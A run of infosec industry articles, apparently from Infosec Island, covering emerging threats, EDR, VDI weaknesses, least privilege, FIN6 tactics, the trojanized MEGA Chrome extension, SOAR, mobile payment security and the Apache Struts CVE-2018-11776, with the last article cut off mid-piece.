Technology has advanced at an astonishing rate in the last decade and the pace is only set to accelerate. Capabilities that seemed impossible only a short time ago will develop extremely quickly, aiding those who see them coming and hindering those who don’t.
Developments in smart technology will create new possibilities for organizations of all kinds – but they will also create opportunities for attackers and adversaries by reducing the effectiveness of existing controls. Previously well-protected information will become vulnerable.
Quantum Arms Race Undermines the Digital Economy
The emergence of quantum computing will herald a step change in processing power, shifting perceptions about what computers can achieve. However, the increase in performance will enable those who develop or acquire the technology to break current encryption standards. With a fundamental security mechanism rendered obsolete, information and transactions of all kinds will suddenly become vulnerable.
The next generation of computer technology – quantum computing – will be able to crack encryption that would have taken traditional computers millions of years in mere hours or minutes. As a consequence, a security mechanism that forms the bedrock of today’s digital economy will require a complete overhaul, potentially exposing organizations to millions in transformation costs and lost trade. However, the practical problems start now. In particular, various parties will pre-empt this new technology by starting to harvest gigantic pools of encrypted information, using it later when the technology is available.
National intelligence organizations will lead the charge to be the first to get their hands on this technology. The sensitive information, communications, services, transactions and critical infrastructure of adversaries will all become an open book. The desire to be first across the line is certain to drive a digital arms race. Who will be the quantum winner? That remains unclear.
Some nation states will want to expand their horizons and use quantum computing as an offensive weapon to undermine the digital economies of their perceived enemies – as will others who can get early access to the technology. Organizations in both the public and private sectors will then be prime targets for a range of attackers. None will be safe, even those that believe their information is secure now.
Artificially Intelligent Malware Amplifies Attackers’ Capabilities
Attackers will also take advantage of breakthroughs in artificial intelligence (AI) to develop malware that can learn from its surrounding environment and adapt to discover new vulnerabilities. Such malware will surpass the performance of human hackers, exposing information including mission-critical information assets and causing financial, operational and reputational damage.
According to many futurists, AI will bring huge benefits to society, especially in areas such as research and healthcare. However, it will also be deployed in more damaging ways, one of which will be to build computer malware that can change both its form and purpose. Attackers will use this artificially intelligent malware to find new ways to access an organization’s network and disrupt its operations. Mission-critical information assets such as trade secrets, R&D plans and business strategies will be targets for compromise – all without detection.
As it is AI-based, this new form of malware will learn from its environment, analyzing applications and systems to discover and exploit new vulnerabilities in real time. It will be hard to distinguish what is safe from unauthorized access and what isn’t. Even information previously believed to be well protected will be open to compromise.
Conventional techniques used to identify and remove malware will quickly become ineffective. Instead, AI-based solutions will be needed to fight this new malware – leading to a race for supremacy between offensive and defensive AI. The eventual winners will be hard to spot for some considerable time.
Attacks on Connected Vehicles Put the Brakes on Operations
While advanced computing power will be used to directly target information assets, the prevalence of computers in connected vehicles will create new physical threats. By hacking connected systems, including those that control the vehicle, attackers will cause accidents that threaten human life and disrupt supply chains – not to mention impacting the reputation and revenue of vehicle manufacturers.
Attackers will look to remotely hack a range of connected vehicles – cars, lorries, vessels and trains – taking advantage of vulnerabilities within on-board systems to take control of them, steal them, or disable vital safety features. All forms of vehicles will be exposed. The sheer scale of targets will be dramatic: for example, the number of connected cars manufactured globally is predicted by Gartner to grow from 12.4 million in 2016 to 61 million by 2020.
The effects will be felt by various people and organizations. Individuals who travel in connected vehicles, or are in the vicinity, will have their lives put at risk. Organizations with supply chains that rely on connected vehicles to transport goods or materials will face operational disruption. Vehicle manufacturers and their subcontractors will face reputational damage, and maintenance providers will come under pressure to perform immediate software and hardware updates.
Liability for incidents – including deliberate attacks – will be a particularly hot topic. Insurance companies will be forced to rethink their strategies to take into consideration claims over incidents involving connected vehicles; organizations will wish to consider themselves blameless but may be held liable; while vehicle manufacturers are likely to face complex class action legal battles should incidents begin to fall into recognizable patterns.
Preparation Must Begin Now
Information security professionals are facing increasingly complex threats—some new, others familiar but evolving. Their primary challenge remains unchanged; to help their organizations navigate mazes of uncertainty where, at any moment, they could turn a corner and encounter information security threats that inflict severe business impact.
In the face of mounting global threats, organization must make methodical and extensive commitments to ensure that practical plans are in place to adapt to major changes in the near future. Employees at all levels of the organization will need to be involved, from board members to managers in non-technical roles.
The threats listed above could impact businesses operating in cyberspace at break-neck speeds, particularly as the use of the Internet and connected devices spreads. Many organizations will struggle to cope as the pace of change intensifies. These threats should stay on the radar of every organization, both small and large, even if they seem distant. The future arrives suddenly, especially when you aren’t prepared.
About the author: Steve Durbin is Managing Director of the Information Security Forum (ISF). His main areas of focus include strategy, information technology, cyber security and the emerging security threat landscape across both the corporate and personal environments. Previously, he was senior vice president at Gartner.Copyright 2010 Respective Author at Infosec Island
Most chief information security officers have begun to shift their security posture toward gaining more visibility into the way attacks occur, and how their organizations become targets, admitting they can’t protect their infrastructure from all cyber threats 100 percent of the time. Increasingly, CISOs recognize that visibility must be relevant if they want to efficiently contain breaches and not waste precious time on a witch-hunt.
Prevention is not enough
A recent survey by security company Bitdefender shows that one in four CISOs in the US and Europe admit their company has suffered a breach in the past year. Failure to detect a breach quickly may lead to full infrastructure compromise, irreversible data loss, and financial repercussions. For some companies, the implications of a breach may be so severe that they would never recover.
This explains why companies have rapidly embraced active defense mechanisms, such as endpoint detection and response (EDR) tools, to get relevant, accurate reports of security operations and analytics. EDR solutions not only help CISOs protect their infrastructure against sophisticated cyber threats, facilitate early detection and gather intelligence, but also bring better visibility to stealthy attacks, enabling rapid containment.
Detection and response capabilities allow security teams to easily and immediately detect an attack and act to minimize the impact on the network, brand reputation and customers. Companies that use an EDR solution acknowledge that a cyberattack can occur at any time, and security platforms can only address 99 percent of threats. EDR tools focus on addressing the last one percent of threats, allowing for greater fidelity in incident investigations. However, even though stacking multiple solutions including EDR, brings stronger security, CISOs still face trouble managing multiple platforms, chasing false alerts and providing adequate security resources while keeping costs down.
A truly effective EDR solution must drive security focus and enable the organization’s overall security strategy. Otherwise, visibility can be seriously impaired by the sheer volume of potentially non-critical security alerts. The point of EDR is to flag any potential security threat and help increase the overall security posture of an organization, without filtering out relevant security alerts. Without a proper EDR solution, increased visibility can backfire and cause alert fatigue, overburdening IT and security departments that are already stretched thin in terms of resources and manpower.
CISOs now place the need for faster detection and response capabilitiesas the second main driver for enhancing their company’s cybersecurity posture, winning out over increased productivity which was the main driver selected in a 2016 survey conducted by Bitdefender.
Meaningful intelligence makes a world of difference
EDR tools that don’t have priority-based alert filtering mechanisms can slow the detection and response process of real threats, as it may send IT and security staff on fruitless investigation paths. EDR alerts should not be about the sheer number of triggered alerts, but about intelligent, reliable, and meaningful alerts with a high probability of pointing to a real threat.
IT and security teams that are already overburdened may end up ignoring or disregarding what can feel like a never-ending tide of security alerts. Triggered alerts could take days, weeks, and even months before they’re addressed and investigated, meaning a lack of staff to review them could be just as detrimental as the lack of an EDR solution in terms of the time it takes to detect a breach.
The major benefit of meaningful EDR alerts is that accurate and actionable security alerts lead to fast detection and response, without overburdening IT or security staff with trivial notifications. Rapid detection of data breaches means incident response procedures can be immediately triggered to contain, mitigate, and prevent full-blown security incidents.
The true power of an effective security posture lies in a layered security defense, augmented by next generation detection and response tools that accurately catch and stop potential data breaches as they occur. Based on the data in this survey, it’s fair to say that organizations cannot afford the absence of the right security tools.
About the author: Liviu Arsene is a Senior E-Threat analyst for Bitdefender, with a strong background in security and technology. Reporting on global trends and developments in computer security, he writes about malware outbreaks and security incidents while coordinating with technical and research departments.Copyright 2010 Respective Author at Infosec Island
Many CISOs and security pros see Virtual Desktop Infrastructure (VDI) and other remote application solutions as security barriers. They think VDI isolates sensitive resources from the user's device, making it impossible for hackers to bust through. But that’s a dangerous myth. In reality, VDI is only a minor hurdle for cyber-criminals.
It doesn’t matter whether your business is using VDI so employees can access server-hosted desktops from thin clients or personal laptops, or giving third-parties “controlled” access to corporate assets, or allowing IT admins and other privileged users to use VDI servers as “jump hosts” for managing the enterprise crown jewels. Whatever the VDI use case, corporate assets are still exposed. Here’s why:
- Thin clients
An employee using a thin client to connect to a remote VDI desktop running Windows is no better off security-wise than any other Windows laptop user. The remote desktop is still exposed to a variety of standard attack vectors, including email, web, external media, user-installed applications, and many others.
- Unmanaged employee devices
In many companies, employees are allowed to connect to corporate VDI desktops from unmanaged devices such as personal laptops. But what happens when those end-user devices are already compromised? In these scenarios, the attacker first gains control over the user’s personal laptop. He then impersonates the user and interacts with the remote VDI desktop. This doesn’t require attacker sophistication. It’s as simple as installing commoditized, off-the-shelf remote control software on the user’s personal laptop, waiting for the user to authenticate, and then controlling the VDI session in the user’s name.
Some people think that by preventing clipboard operations between the user’s personal laptop and the remote VDI desktop, you can thwart attacks. But that doesn’t really work. Attackers can stealthily and instantly send an entire script via emulated keystrokes, and then launch the script on the remote VDI desktop. From there, the path to complete control of the VDI desktop is short. This kind of attack doesn’t require any zero-day vulnerability and can be executed by any determined attacker.
- Third-party connections
Third-party vendors and contractors who use VDI to access your corporate resources make your business just as vulnerable as employees with unmanaged devices. As seen in the recent Target, and Equifax breaches, cyber-criminals only need to infect one of the vendor’s machines. After that, they can gain control of sensitive resources via VDI. Two-factor authentication for VDI sessions doesn’t help mitigate this risk because the attacker, already present on the machine, simply waits for a successful authentication and then launches the attack.
- Privileged users
Some enterprises let their IT administrators connect to privileged management consoles via jump hosts or jump boxes hosted on VDI terminal servers. While jump hosts are often a healthy practice, problems begin when the device used to access the privileged host is a compromised personal device – which is often the case. The bad guys look for IT administrators and target them personally. Once they infect an IT administrator’s personal device, they can literally control the entire organization over VDI.
The VDI Isolation Problem
Why doesn’t VDI work for security? It all comes down to this: VDI is not an isolation solution. It does not isolate the remote sensitive resources from the device used to access them. If hackers control the end-user’s device, they control the VDI resources.
Anything short of a full isolation approach leaves you vulnerable. That’s why local or remote access of sensitive resources should never be mixed with any corporate or personal usage that is exposed to the outside world. This guidance is being recommended more and more by security vendors like Microsoft and financial industry institutions like SWIFT (PDF), which propose using a separate instance of an operating system (OS) for accessing sensitive resources, including those residing on VDI.
Isolation in Action
So what would this look like in practice? A new, hypervisor-based approach entails turning end-user devices into software-defined endpoints, in which each endpoint has multiple isolated VMs. This approach fully isolates access to sensitive resources, without limiting the user’s freedom or requiring multiple laptops or desktops.
Everything a user does runs in one of their endpoint’s VMs, including OSes and all applications. One OS can be used for personal, unlocked usage, and the other for accessing sensitive resources, either locally or via VDI. Attackers controlling the personal VM cannot see or control the sensitive VM. They’d have to break out of the VM to be able to breach the security of the system. This provides the assured protection businesses need and the high productivity users crave.
VDI on its own provides a false sense of security that is misleading, at best, and can be devastating to business, at worse. It’s paramount that enterprises realize this risk and take appropriate isolation measures to protect their business.
About the author: Tal is a passionate entrepreneur and veteran R&D leader with 15 years of experience in the cyber and IT domains. Tal started his official career in the Israeli Ministry of Defense, in which he pioneered multiple mission-critical cyber products. He then joined the leadership team of Wanova – a desktop virtualization startup that was later acquired by VMware. He holds multiple US patents as well as an M.Sc. degree in Computer Science from the Technion.Copyright 2010 Respective Author at Infosec Island
When it comes to protecting data, removing admin rights is one of the most effective methods at an organisation’s disposal. Doing so minimises the likelihood that a successful attack on an individual’s account will be able to affect widespread system changes or install malware.
But many organisations still overlook the fact that restricting user admin rights represents just one cog in the data protection machine. Risks can never be completely removed but, by complementing the removal of admin rights with additional security measures, businesses can go a long way towards reducing the impact of any attacks.
More security means less privilege across the board
In 2017, our Microsoft Vulnerabilities Report showed that 80 per cent of all vulnerabilities in core applications, such as Word, Excel and PowerPoint, can be eliminated by restricting the number of individuals who hold admin rights within an organisation.
Although it is a strong starting point, organisations must view this as a platform to build their data security on, rather than a silver bullet to end all concerns around potential attacks. For example, a default setup of user accounts that hold the lowest possible level of privilege needed for staff to carry out their roles can bolster security by:
- Minimising the parameters of an attack: Attackers will only be able to access areas of a business related to that user's role, further reducing the type and amount of information they can access.
- Reducing the spread of malicious software: Should an account become compromised, embedded malware will only be able to disseminate across a small part of a network, again minimising an attacker’s impact.
- Reducing insider threat: Attacks can originate from inside an organisation through aggrieved employees. By creating an environment of least privilege, businesses can reduce these users’ access solely to the data and systems pertinent to their roles, again enhancing data protection.
- Increasing network stability: Unsolicited changes can be identified more quickly and easily when the scope of systems and files affected is reduced, giving organisations a timely advantage when it comes to resolving them.
The advantages of least privilege adoption are seen most prominently when organisations are faced with a successful assault on their systems. In cases where attackers can breach a company's outer defences, the level of access they will be granted on the inside is significantly reduced.
Although it is often only when an organisation suffers a successful assault on its systems that it is able to appreciate the benefits of this approach, being prepared for this situation is invaluable. Under least privilege adoption, attackers that breach a company’s outer defences will find that they are granted a significantly reduced level of access to its data and systems.
Layering your security with application control
To better defend themselves against malicious attacks, organisations should be actively introducing application control.This important additional layer of security makes certain that unauthorised applications are unable to execute in a way that compromises the security of data.
The process is managed through a process of whitelisting and blacklisting all applications, ensuring administrators have full visibility and control over their IT systems. The advantages of application control include gaining the ability to:
- Monitor and adjust applications within a network: Provides a clear and complete picture of all active and inactive applications and systems.
- Prevent unauthorised execution: Only authorised applications can execute. All executions that are not approved on a whitelist are automatically prevented from doing so.
- Better understand data traffic: Companies operating application control can more easily monitor the flow of data within their systems, providing details on users’ access requirements and activities.
- Improve network stability: By limiting the extent to which changes can be made, administrators can promote greater stability and better mitigate adverse changes.
- Protection against known exploits: Vulnerabilities in unpatched operating systems and third-party applications can be reduced.
By controlling applications in this way, businesses can reduce their vulnerability to attacks by gaining more control and visibility over the way in which their systems interconnect with applications. This provides greater visibility over the transfer of data throughout their organisation as a result.
Those that are committed to developing stronger safeguards against cyber threats shouldn’t rely on just one method to keep their data safe. Instead, they should proactively combine methods to bolster the security setup of their business and reduce the risk of damaging data breaches as a result.
About the author: Andrew has been a fundamental part of the Avecto story since its inception in 2008. As COO, Andrew is responsible for Avecto's end-to-end customer journey, leading the global consultancy divisions of pre-sales, post sales and training, as well as customer success, support and IT.Copyright 2010 Respective Author at Infosec Island
A cybercriminal group focused on stealing payment card data records has been using new tactics, techniques and procedures (TTPs) in attacks observed in 2017 and 2018, IBM X-Force security researchers report.
First detailed in April 2016, the group has been initially observed in 2015, when it was compromising the point-of-sale (PoS) systems of organizations in the retail and hospitality sectors. At the time, FireEye determined that the hackers possessed valid credentials for each of the targeted companies’ networks.
In a new report detailing the group’s whereabouts, IBM reveals that recently seen FIN6 attacks combine previously known TTPs with new ones, such as the abuse of IT management software for malware deployment or the use of Windows Management Instrumentation Command (WMIC) for the automation of PowerShell command and script remote execution.
The cybercriminal group was observed deploying FrameworkPOS via an enterprise software deployment application and employing Metasploit-like behaviour, such as randomly generating service names in Windows event logs, dynamically generating file names for binaries on disk and hostnames in event logs.
The hackers would also inject malicious Meterpreter code into legitimate Windows processes, use PowerShell commands obfuscated using base64 encoding and gzip compression, and exclude specific processes from targeting.
Other changes in the group’s techniques include the use of a new DLL filename for the FrameworkPOS malware, the use of a .dat file as a cover filename for the malicious PowerShell script that injects FrameworkPOS, the use of specific PowerShell parameters to avoid detection, and the use of “1.txt”, “services.txt” and “.csv” files as reconnaissance output names.
“While some of these TTPs may be side effects of tools FIN6 actors were using or specific to the environment in which the actors were operating, we believe many represent new TTPs that could become characteristic of evolved FIN6 standard operating procedures,” IBM says.
Despite the use of new techniques, the security researchers are confident that the attacks were performed by FIN6, due to the use of TTPs already associated with the group. In fact, they reveal that 90% of the tactics had been previously associated with the hackers.
The security researchers also warn that the hackers have demonstrated the ability “to gain systemic footholds in targeted networks, advance laterally and eventually achieve its objective of exfiltrating valuable data from the victim organization’s infrastructure.”
The group uses publicly available tools for reconnaissance and lateral movement, including the FrameworkPOS that allows it to harvest payment card data from POS endpoints’ memory. Not only are most of the group‘s tools simplistic or publicly available, but their encoding mechanisms are relatively easy to decipher as well.
“FIN6’s skill lies in its ability to bypass security controls and employ stealthy techniques, which allows the group to steal large amounts of data and sell at least some of it for a profit in dark web markets,” IBM notes.Infosec Island
So I saw an ad for this project, “OpenWorm.” Seemed like it checked all the boxes that cause me to click a link:
Vaguely open source
Something to do with Legos
Has an app associated with it. “Get the App!”
And it’s for “real worm geeks!”
I consider myself a geek, and I’m real. Except, what the hell is the worm part? And even though I’m a real geek, I’m not a “worm geek.” Eeewww.
Turns out that the OpenWorm project is trying to digitally simulate the mind of one of Earth’s simplest creatures, the C. elegans nematode, a microscopic worm with only 302 neurons and 95 muscle cells. Researchers have scanned C. elegans and uploaded its neural map into a docker container or something, where you can troll it with various stimuli and model its reactions.
Its tiny brain is even smaller than those of many YouTube celebrities and can easily fit into an app on your phone.
The OpenWorm project reminds me of an upcoming event that’s going to solve all my aching-old-man problems: the Singularity. Coined by futurist Ray Kurzweil, the Singularity is defined as the moment when human consciousness merges with, or is surpassed by, artificial intelligence. After that moment, history will be defined as “prior” and “after” the Singularity, because civilization will change radically.
There are two possible pathways to the Singularity. The optimistic route is that science will figure out how to scan a human mind and upload it into the cloud while preserving its consciousness. Once we’ve shuffled off this mortal coil, we’ll all be immortal. The OpenWorm project is a baby step toward that goal of immortality.
I’m already looking forward to picking out a sporty android body to carry my artificial intelligence around. Brand consultants at Tesla should be on this, because people are going to be self-conscious about what model of robot body they are rocking.
There’s a second, darker path to the Singularity. You’re eating your Wheaties and reading the paper in the morning and you tell your life partner, “Hey, babe, it says here that those ‘geniuses’ at Google created an artificial intelligence that achieved consciousness. And, yup, it’s already decided to exterminate the human race. Knew this would happen. Thanks, Obama.”
In this darker scenario, evil-looking male robots will be assigned to hunt and track human scum in the shelled-out underworld of Mountain View, California. It’s a trope we’re all so familiar with and no one will be surprised if it happens.
Stop and consider for a moment. What will the role of hackers be in the Singularity? It depends on how we get there.
Hackers in the Singularity
On the “light” path, where human minds migrate into computers, hacking will becoming the worst possible crime that anyone could commit. Hacking someone else’s mind could be tantamount to murder (or “real-death” in Altered Carbon lingo), or slavery. Hackers will be the equivalent of demons attacking your mind. Imagine you and your bestie are walking down Robson Street in your Tesla model XY robot sleeves, when suddenly your friend freezes and the words “ALL YOUR BASE ARE BELONG TO US” starts scrolling across his face. “OMG, dude. You’re being hacked right now!” you exclaim, and you try to summon the Royal Canadian Mounted Cyber Police. But the only acknowledgement you receive is “IM IN UR BASE KILLING UR D00DZ,” and you realize you’re being hacked, too. Chilling, isn’t it?
On the “dark” path, Google Exterminator™ droids are using advanced data analytics to find the last pockets of human resistance to show them ads immediately prior to dispatching them. Hacking, in this world, will become humanity’s greatest hope, and hackers will be heroes. They will be freedom fighters like John Connor or Moses, and the black hoodie will be the symbol of resistance and liberation. Hackers will finally breach G Suite, perform lateral movements, and smash its defense grid.
Now, isn’t that interesting? On one path to the Singularity, hacking is the worst possible crime. But on the other path, hacking is humanity’s highest calling. Either way, the absolute value of hackers is going to be maximal. If you’re a young reader trying to choose a career, infosec should be an even more enticing option now that you’ve gamely read this whole article.
There’s an artificial intelligence conference in Australia that polls its attendees about when they think the Singularity will happen. Most recent guesses say 2040, though some predict it will come as early as 2020. Guys, that’s super close. The Texas Rangers, bless their hearts, have never won a World Series and may never get a chance to do so, because one assumes that, in the Singularity, all baseball games will be simulated inside silicon-based computers and have team names like the Dell Blades, the Intel Insides, or the Nippon Ham Fighters (oh, wait, that last one is already taken).
Since it’s looking like the Singularity will be a thing before I succumb to liver cirrhosis, I can probably stop contributing to my flaccid 401(k) retirement plan, because who’s going to need those in the Singularity?
Copyright 2010 Respective Author at Infosec Island
A trojanized version of the MEGA extension was uploaded to the Google Chrome webstore earlier this week and was automatically pushed to users via the autoupdate mechanism.
Through this extension, users get direct access to the MEGA secure cloud storage service in their browser, for improved performance. Also available on Android, the extension is highly popular, with over 1.7 million downloads in the Chrome store (it is also available on MEGA’s website).
On September 4, the cloud storage service announced that an unknown attacker managed to upload a trojanized iteration of the extension (version 3.39.4) to the Google Chrome webstore. The malicious code would immediately be sent to users who had the autoupdate feature enabled.
Once installed, the rogue extension would ask users to allow it to read and change all the data on the websites they visit. Armed with the elevated permissions, the malicious application version would attempt to gather user credentials and send them to a server located in Ukraine, MEGA reveals.
The code was targeting credentials for sites such as amazon.com, live.com, github.com, google.com (for webstore login), myetherwallet.com, mymonero.com, idex.market, and HTTP POST requests to other sites, but did not target mega.nz credentials.
According to MEGA, the rogue extension version was removed from the Chrome store and replaced with a legitimate iteration (version 3.39.5) four hours after the breach occurred. The clean variant was served to users through the autoupdate mechanism. Google removed the extension from the webstore five hours after the breach.
“You are only affected if you had the MEGA Chrome extension installed at the time of the incident, autoupdate enabled and you accepted the additional permission, or if you freshly installed version 3.39.4,” MEGA says.
All users who might have visited sites that send plain-text credentials through POST requests (or used another extension that does so) while the trojanized extension was active likely had their credentials compromised, on those sites and/or applications.
The issue, MEGA says, is that Google disallows publisher signatures on Chrome extensions and only relies on signing them automatically after upload to the Chrome webstore.
Thus, although the company uses “strict release procedures with multi-party code review, robust build workflow and cryptographic signatures where possible,” Google’s policy “removes an important barrier to external compromise.”
Both MEGAsync and the service’s Firefox extension, which are hosted by the company, are signed and “could therefore not have fallen victim to this attack vector,” MEGA claims. The mobile apps, which are hosted by Apple/Google/Microsoft, are also cryptographically signed, therefore immune as well.
The company hasn’t provided details on how the Chrome webstore account was compromised but is investigating the incident.
Copyright 2010 Respective Author at Infosec Island
In a recent report, Gartner predicted that SOAR adoption rates will rise from 1% to 15% by 2020. These findings highlight two key factors. Firstly, acceptable SOAR protocols are currently lacking in most corporations. Secondly, SOAR tools are gaining in traction and popularity as market validation occurs. The anticipated leap to 15% adoption in under two years is evidence of this.
SOAR tools are quickly emerging and will have a major impact on business.
What Exactly is SOAR?
The purpose of Security Orchestration, Automation, and Response (SOAR) tools are to allow companies to mitigate rising security threats quickly. Adopting SOAR tools will ensure that corporations are better prepared to identify and isolate potential threats before they become a serious issue. SOAR tools allow companies to be proactive as well as reactive in the fight against cybercrime.
Gartner defines SOAR as technologies that allow companies to collect all types of security threats, alerts, and data from various sources and analyze and respond to them in one place. Using SOAR tools, organizations can identify and eliminate duplicates and false positives, which allows security analysts to focus on real threats most efficiently. By leveraging human expertise and the time savings afforded by automation and orchestration, decision-making and reaction times can be significantly faster.
One of the main challenges in the cybersecurity industry today is detection of cyber threats. Dwell times are currently estimated to average six months. This means that malware and other malicious code can be entrenched in a company’s ecosystem, gathering information long before the unthinkable happens. Speed is of the essence when it comes to combating bad actors. SOAR tools allow companies to clearly define incident management and response as well as implement these processes at scale.
Why SOAR and Why Now?
Cybercrime is a pressing and rising problem, costing the global economy an estimated $450 billion a year. As new technologies evolve to fight cyber criminals, so too do the tactics and agility of the perpetrators. The average company is simply unprepared to deal with this impending threat. Building a larger firewall will only cause the attacker to go out and look for a longer metaphorical ladder.
One only has to look at disastrous high profile cases like Equifax to see the implications of major hacking attacks. As attackers become better at finding new methods of cracking passwords or breaking firewalls, traditional security technologies are being left in the dust. Worse still, many security operations rely primarily on manually created documentation and outdated protocols, tools, and processes. Security teams that are ramping up investments against cybercrime are often dispersed and disorganized. They have a plethora of tools at their fingertips, but no cohesive way of using them to effectively eradicate the threat.
SOAR is proving to be a vital way of giving security professionals a roadmap to predict, prevent, and tackle threats effectively. Orchestration provides a vital conduit to unify security tools and their actions in common windows, automation allows repetitive tasks to be executed at machine speed, and incident management provides full visibility across the attack lifecycle.
SOAR Market Validation
Market validation is beginning to occur as SOAR tools are being increasingly adopted by key players. Microsoft's acquisition of Hexadite, Splunk's acquisition of Phantom, and IBM taking over Resilient Systems will help to speed up widespread adoption of SOAR as companies large and small follow in their footsteps.
Moreover, as more security organizations are faced with the challenges of limited resources and a lack of talent in cyberspace, there is a growing need to harness technology to automate and streamline workflows. Not only will SOAR tools help to resolve the talent gap, but their adoption will also reduce costs and expedite response.
If corporations around the globe keep dragging their heels in the fight against cybercrime, they run the risk of losing money and suffering reputational damage. SOAR tools allow for an effective way of fighting security threats through a central collection of intelligence that can be quickly transformed into action.
As has been showcased by multiple public data breaches and filled column inches, security threats are omnipresent. Organizing an efficient response through sophisticated tools that scale companies’ resources, improve response times, and automate mundane security tasks will be vital to thwart attackers.
About the author: Rishi Bhargava a co-founder of Demisto. A creative thinker and problem solver, Rishi has been building and managing successful enterprise products for many years. Making things “simple” is really hard. Rishi believes simplicity in every aspect will delight Demisto customers and has made it the guiding principle.Copyright 2010 Respective Author at Infosec Island
There are more ways to pay for goods and services than ever before. New payment technologies bring growth opportunities for businesses, and they can revolutionize customer experiences at point-of-sale.
However, these new apps and technologies also present payment providers with new types of threats. In order to provide high-security experiences for users, security must be built into these new apps and technologies from the ground up. But there’s reason to believe that ship may have sailed.
The very architecture and developer languages chosen for the latest crop of mobile financial apps and payment solutions like Tap-To-Pay and Pin-On-Glass haven’t necessarily been chosen with security in mind. Therefore, they may have fundamental, systemic vulnerabilities open to compromise.
As smart payment technologies rose to prominence, simple mag stripe readers with virtually no security were ubiquitous among businesses for whom larger PEDs are cost-prohibitive. Luckily, more secure options have come to market since the EMV migration has begun in the United States. These options, such as downloadable mPOS and PIN-on COTS, bring more security than a simple mag stripe, but not nearly enough to meet a financial institution’s standard.
In the past, a payment terminal was a standards-compliant, extensively-researched and secured hardware device that was purpose-built for processing secure transactions. Now, any device with the necessary features can become a payment terminal. Additionally, that device handles all of the transaction processing. Naturally, these changes prompt security challenges.
Tap-To-Pay systems present a particularly novel protection trial; not only are these devices often owned and maintained by non-tech-savvy end users, but they serve numerous purposes each day. One minute a user is playing Candy Crush, and the next they’re executing and processing transactions to and from the world’s largest financial institutions—all on the same pane of glass. Historically, payment systems have segregated the transaction itself from the card’s credentials, but this is no longer the case, presenting a new structural vulnerability for fraud.
Since a smartphone will be managing on-boarding, authentication of the account, cryptographic processing and securely communicating with all involved parties, the security of the device itself is of primary importance. Yet, it is well-known that jailbroken or rooted devices exist around the world and are easily masked from detection on a network. Payment apps must cope with this reality and keep data safe even on compromised devices, so the architecture used to build these applications becomes crucially important. Some apps are only offered on certain platforms for this reason, and others are certified to meet certain standards of protection. App developers must assess platforms for their architecture and security capabilities to best protect sensitive financial data. Even root detection, the ability for an application to identify if the device is more susceptible to intrusion, depends upon an outdated blacklist/whitelist approach, and therefore, knowledge of prior attacks.
So what can a developer do to secure their user’s data in transit, in storage and in use? First off, crypto data must be able to run in a protected environment. The app’s code also needs to be protected from analysis, both static and dynamic. And furthermore, secure and authenticated access must be ensured.
Mobile devices are the most effective hacking tools available today. Used by billions and sharing standardized characteristics, smartphones aren’t able to be protected with traditional IT security techniques. Since operating systems can’t be trusted, the most notable control a developer has is over the app itself. That’s where security really begins.
About the author: Simon Blake-Wilson is Chief Operating Officer at Inside Secure, a global provider of security solutions for mobile and connected devices.He co-authored the book, Digital Signatures: Security and Controls, and edited several ANSI standards on Elliptic Curve Cryptography which have been adopted by the US government.Copyright 2010 Respective Author at Infosec Island
About a week ago, a security researcher disclosed a critical remote code execution vulnerability in the Apache Struts web application framework that could allow remote attackers to run malicious code on the affected servers. The vulnerability (CVE-2018-11776) affects all supported versions of Struts 2 and was patched by the Apache Software Foundation on Aug. 22. Users of Struts 2.3 should upgrade to 2.3.35; users of Struts 2.5 need to upgrade to 2.5.17. They should do so as soon as possible, given that bad actors are already working on exploits.
More critical than the Equifax vulnerability
“On the whole, this is more critical than the highly critical Struts RCE vulnerability that the Semmle Security Research Team discovered and announced last September,” Man Yue Mo, the researcher who uncovered the flaw, told the media, referring to CVE-2017-9805. CVE-2017-9805 was announced the same day (September 7, 2017) that Equifax announced the massive data breach via CVE-2017-5638, which led to the lifting of personal details of over 148 million consumers.
Struts, an open source framework for developing web applications, is widely used by enterprises worldwide, including Fortune 100 companies like Lockheed Martin and Virgin Atlantic, as well as the U.S. Internal Revenue Service.
In 2017, the Equifax credit reporting agency used Struts in an online portal, and because Equifax did not identify and patch a vulnerable version of Struts, attackers were able to capture personal consumer information such as names, Social Security numbers, birth dates, and addresses of over 148 million U.S. consumers, nearly 700,000 U.K. residents, and more than 19,000 Canadian customers.
I spoke to Black Duck by Synopsys technical evangelist Tim Mackey about the newly discovered Struts vulnerability. “Modern software is increasingly complex, and identifying how data passes through it should be a priority for all software development teams,” Tim noted. “To give you some background, developers commonly use libraries of code, or development paradigms which have proven efficient, when creating new applications or features. This attribute is a positive when the library or paradigm is of high quality, but when a security defect is uncovered, this same attribute often leads to a pattern of security issues.
“In the case of CVE-2018-11776,” Tim continued, “the root cause was a lack of input validation on the URL passed to the Struts framework. In both 2016 and 2017, the Apache Struts community disclosed a series of remote code execution vulnerabilities. These vulnerabilities all related to the improper handling of unvalidated data. However, unlike CVE-2018-11776, the prior vulnerabilities were all in code within a single functional area of the Struts code. This meant that developers familiar with that functional area could quickly identify and resolve issues without introducing new functional behaviors.
“CVE-2018-11776, on the other hand, operates at a far deeper level within the code, which in turns requires a deeper understanding of not only the Struts code itself but the various libraries used by Struts. It is this level of understanding which is of greatest concern—and this concern relates to any library framework. Validating the input to a function requires a clear definition of what is acceptable. It equally requires that any functions available for public use document how they use the data passed to them. Absent the contract such definitions and documentation form, it’s difficult to determine if the code is operating correctly or not. This contract becomes critical when patches to libraries are issued, as it’s unrealistic to assume that all patches are free from behavioral changes.”
Shortly after the Apache Software Foundation released its patch, a proof-of-concept exploit of the vulnerability was posted on GitHub. The PoC included a Python script that allows for easy exploitation. The firm that discovered the PoC, threat intelligence company Recorded Future, also said that it has spotted chatter on underground forums revolving around the flaw’s exploitation. Companies not wanting to become the next Equifax should immediately identify what version of Apache Struts they have in use and where, and apply the patch as needed.
About the author: Fred Bals is a corporate storyteller for Black Duck by Synopsys, focused on providing insights that help security, risk, legal, DevOps, and M&A teams better understand open source security and license risks. Fred is a researcher for the Synopsys Center for Open Source Research & Innovation, and co-author of the 2018 Open Source and Risk Analysis report.Copyright 2010 Respective Author at Infosec Island
Whether it’s paying bills, transferring money, reviewing account balances or even trading stocks, consumers increasingly rely on mobile banking apps from their device, whether it’s a mobile phone or tablet or the smart watch on their wrist. The growth and popularity of fintech or financial technology is spreading rapidly.
A recent market research study found consumer mobile banking usage increased by almost 50 percent within the past year. According to Statista, in 2018 the transactional value of the fintech market in the United States is more than $1 million dollars.
Mobile banking is undeniably convenient, but are the apps that handle our money 100% secure?
The unfortunate reality is that almost all apps are susceptible to hacking attacks and when damages occur in the financial services industry, the results can severely affect not only the targeted institution, but unlucky consumers as well.
